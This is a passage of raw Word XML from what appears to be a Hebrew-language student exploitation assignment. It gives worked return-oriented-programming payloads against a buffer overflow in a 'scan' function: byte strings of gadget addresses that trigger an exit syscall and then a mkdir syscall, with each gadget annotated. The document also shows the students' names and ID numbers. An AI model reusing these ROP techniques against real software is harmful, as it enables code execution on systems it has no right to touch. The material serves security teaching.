        <w:t>scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נכתוב למחסנית ערכים כך שהיא תבצע:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734CA6DC" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7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rax=60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAA4AB1" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7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rdi=17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46006368" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7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Syscall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F27755" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:bidi/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>כך נבצע יציאה מהתוכנית עם ערך חזרה כנדרש</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD8B698" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>zyxwvutsrqponmlkjihgfedc\xfe\x15\x40\x00\x00\x00\x00\x00\x3c\x00\x00\x00\x00\x00\x00\x00\x63\x16\x40\x00\x00\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x9d\x0e\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E1C055" w14:textId="32CC17ED" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:bidi/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>הקלט מפוצל פר בית:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169C51ED" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7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zyxwvutsrqponmlkjihgfedc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FFAACC" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7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</w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">\xfe\x15\x40\x00\x00\x00\x00\x00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>go to pop %rax ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C480257" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7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</w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">\x3c\x00\x00\x00\x00\x00\x00\x00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>popped into %rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318EA038" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7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</w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">\x63\x16\x40\x00\x00\x00\x00\x00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>go to pop %rdi ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A54B4D" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7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</w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">\x11\x00\x00\x00\x00\x00\x00\x00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>popped into %rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B46A356" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7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</w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">\x9d\x0e\x40\x00\x00\x00\x00\x00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>go to syscall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF4F654" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00F40F5B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39AD76D" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF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rtl/>
        </w:rPr>
        <w:t>נשתמש בקלט הבא כדי ליצור תיקייה בעצת השם "</w:t>
      </w:r>
      <w:r>
        <w:t>my_first_exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>". בעזרת החולשה ב</w:t>
      </w:r>
      <w:r>
        <w:t>scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נכתוב נכתוב למחסנית את המידע הבא כדי לבצע את הפעולות הבאות:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66471B14" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF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rtl/>
        </w:rPr>
        <w:t>נכניס למחסנית את שם התיקיה הרצויה בתחילתה</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E6CE18" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF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rtl/>
        </w:rPr>
        <w:t>נשים ב-</w:t>
      </w:r>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> את הכתובת שבה נוציא מן המחסנית </w:t>
      </w:r>
      <w:r>
        <w:t>rsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נוכחי</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417D43EA" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF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rtl/>
        </w:rPr>
        <w:t xml:space="preserve">נדחוף </w:t>
      </w:r>
      <w:r>
        <w:t>rsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נוכחי ונשים אותו ב-</w:t>
      </w:r>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA32FA3" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF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rtl/>
        </w:rPr>
        <w:t>נשים 83 ב</w:t>
      </w:r>
      <w:r>
        <w:t>rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786772ED" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF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rtl/>
        </w:rPr>
        <w:t>נשים 755 באוקטלית ב</w:t>
      </w:r>
      <w:r>
        <w:t>rsi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B0F1E6" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF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rtl/>
        </w:rPr>
        <w:t xml:space="preserve">משום שהשגנו את </w:t>
      </w:r>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> אחריי כמות מסויימת של </w:t>
      </w:r>
      <w:r>
        <w:t>pop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>ים ו</w:t>
      </w:r>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>ים ששינו את ה-</w:t>
      </w:r>
      <w:r>
        <w:t>rsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>, נצטרך לתקן אותו בהתאם (להוריד ממנו 48), לכן נקפוץ לכתובת שעושה כך 48 פעמים</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263CCB84" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF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rtl/>
        </w:rPr>
        <w:t>נקפוץ ל-</w:t>
      </w:r>
      <w:r>
        <w:t>syscall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>, כך שכל הפרמטרים שלנו הם הפרמטרים הרצויים</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05583AF5" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7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my_first_exploit\x00ihgfedc\x63\x16\x40\x00\x00\x00\x00\x00\xa6\x07\x40\x00\x00\x00\x00\x00\xed\x08\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x61\x16\x40\x00\x00\x00\x00\x00\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x15\x40\x00\x00\x00\x00\x00\x53\x00\x00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9d\x0e\x40\x00\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DA7EBB" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:bidi/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>הקלט מפוצל פר בית:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3C8879" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>my_first_exploit\x00ihgfedc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464C812B" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">\x63\x16\x40\x00\x00\x00\x00\x00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>go to pop %rdi ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0004282A" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">\xa6\x07\x40\x00\x00\x00\x00\x00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>gets popped into rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A85890F" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">\xed\x08\x40\x00\x00\x00\x00\x00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>go to push rsp    and $8, %al   call* %rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE7C7F6" w14:textId="4083BF95" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">rsp and return </w:t>
      </w:r>
      <w:r w:rsidR="003F07E2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> from call* are pushed onto the stack, return </w:t>
      </w:r>
      <w:r w:rsidR="00F52B9C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> is popped into rsi, rsp is popped into rdi and then we return to the values we entered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EF02F4" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">\x00\x00\x00\x00\x00\x00\x00\x00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>popped by pop rbp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11513BA3" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">\x61\x16\x40\x00\x00\x00\x00\x00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>go to pop %rsi pop %r15 ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74698C64" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">\xed\x01\x00\x00\x00\x00\x00\x00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>popped into %rsi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103BD0AB" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">\x00\x00\x00\x00\x00\x00\x00\x00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>popped into %r15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C0D8CE" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">\xfe\x15\x40\x00\x00\x00\x00\x00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>go to pop %rax ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4A48E1" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">\x53\x00\x00\x00\x00\x00\x00\x00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>popped into %rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DAA4BF" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">\x33\x08\x40\x00\x00\x00\x00\x00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>dec %rdi ret (48 times)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EF1864" w14:textId="622A5DFA" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">\x9d\x0e\x40\x00\x00\x00\x00\x00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>go to syscall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E643A08" w14:textId="36130233" w:rsidR="00313914" w:rsidRDefault="00313914">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12482856" w14:textId="05EB103A" w:rsidR="00313914" w:rsidRDefault="00313914">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25DA391E" w14:textId="3FCE08A5" w:rsidR="005B19DB" w:rsidRDefault="005B19DB">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E2E6620" w14:textId="77777777" w:rsidR="005B19DB" w:rsidRDefault="005B19DB">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005B19DB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1C3E4" w14:textId="77777777" w:rsidR="00CA0938" w:rsidRDefault="00CA0938">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="24C9613D" w14:textId="77777777" w:rsidR="00CA0938" w:rsidRDefault="00CA09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28F99" w14:textId="77777777" w:rsidR="00CA0938" w:rsidRDefault="00CA0938">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3A772D59" w14:textId="77777777" w:rsidR="00CA0938" w:rsidRDefault="00CA09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A8D09" w14:textId="3C65590F" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
    <w:pPr>
      <w:bidi/>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rtl/>
      </w:rPr>
      <w:t xml:space="preserve">חן דוידוב - 209142074, איתן גרוניך </w:t>
    </w:r>
    <w:r w:rsidR="0000727F">
      <w:rPr>
        <w:rtl/>
      </w:rPr>
      <w:t>–</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rtl/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="0000727F">
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>318904703</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="6C00BB5A" w14:textId="77777777" w:rsidR="0000727F" w:rsidRPr="0000727F" w:rsidRDefault="0000727F" w:rsidP="0000727F">
    <w:pPr>
      <w:bidi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C1A16"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C64285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F9B0050"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54FEEF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F5B"/>
    <w:rsid w:val="0000727F"/>
    <w:rsid w:val="001B6BDB"/>
    <w:rsid w:val="002708FB"/>
    <w:rsid w:val="00313914"/>
    <w:rsid w:val="003F07E2"/>
    <w:rsid w:val="005B19DB"/>
    <w:rsid w:val="007702F8"/>
    <w:rsid w:val="00A65086"/>
    <w:rsid w:val="00BD094A"/>
    <w:rsid w:val="00CA0938"/>
    <w:rsid w:val="00D865EC"/>
    <w:rsid w:val="00EC6CF7"/>
    <w:rsid w:val="00F40F5B"/>
    <w:rsid w:val="00F435DE"/>
    <w:rsid w:val="00F52B9C"/>
    <w:rsid w:val="00FC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D6327"/>
  <w15:docId w15:val="{4E79EADB-C51F-49FE-8742-A6A21C933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0727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27F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0000727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chen davidov</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-08T14:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-12T20:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>